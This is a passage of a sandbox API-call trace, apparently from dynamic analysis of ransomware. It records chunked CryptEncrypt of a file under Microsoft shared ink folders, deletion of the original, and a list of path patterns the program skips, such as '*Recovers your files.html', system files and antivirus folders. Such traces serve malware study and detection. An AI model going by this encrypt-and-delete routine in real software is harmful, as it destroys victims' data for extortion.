pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.158] GetLastError () returned 0x0 [0157.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.158] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.158] GetLastError () returned 0x0 [0157.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.158] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.158] GetLastError () returned 0x0 [0157.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.159] GetLastError () returned 0x0 [0157.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.159] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.159] GetLastError () returned 0x0 [0157.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.159] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.159] GetLastError () returned 0x0 [0157.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.159] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.159] GetLastError () returned 0x0 [0157.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.159] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.159] GetLastError () returned 0x0 [0157.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.159] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.159] GetLastError () returned 0x0 [0157.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.159] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.159] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.160] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.160] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.160] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.160] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.160] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.160] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.160] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.160] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.160] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.160] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.160] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.160] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.160] GetLastError () returned 0x0 [0157.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.161] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.161] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.161] GetLastError () returned 0x0 [0157.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.161] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0xf9, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0xf9, lpOverlapped=0x0) returned 1 [0157.161] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf9, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.161] GetLastError () returned 0x0 [0157.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.161] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.161] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0x20 [0157.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml", dwFileAttributes=0x20) returned 0 [0157.161] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 1 [0157.162] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0 [0157.162] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" [0157.162] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.162] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD924.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd924.tmp")) returned 0xd924 [0157.163] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD924.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd924.tmp"), dwFlags=0x1) returned 0 [0157.163] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD924.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd924.tmp")) returned 1 [0157.164] CryptDestroyKey (hKey=0x9ad778) returned 1 [0157.164] wcslen (_String="OK") returned 0x2 [0157.164] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.164] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.164] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0157.164] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0157.164] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0157.164] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*NMCRYPT") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*Recovers your files.html") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.exe") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.dll") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.lnk") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.bat") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.ini") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.msi") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*.scf") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*pagefile.sys*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*AppData*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\winrar\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\java\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\windows\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\ESET\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\AVG\\*") returned 0 [0157.164] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*Atheros*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*Realtek*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*bootmgr*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*boot*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*boot*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*IO.SYS*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*ntldr*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*chrome*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*opera*") returned 0 [0157.165] PathMatchSpecW (pszFile="zh-changjei.xml", pszSpec="*firefox*") returned 0 [0157.165] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", pszSpec="*") returned 1 [0157.165] strlen (_Str="NMoreira") returned 0x8 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: 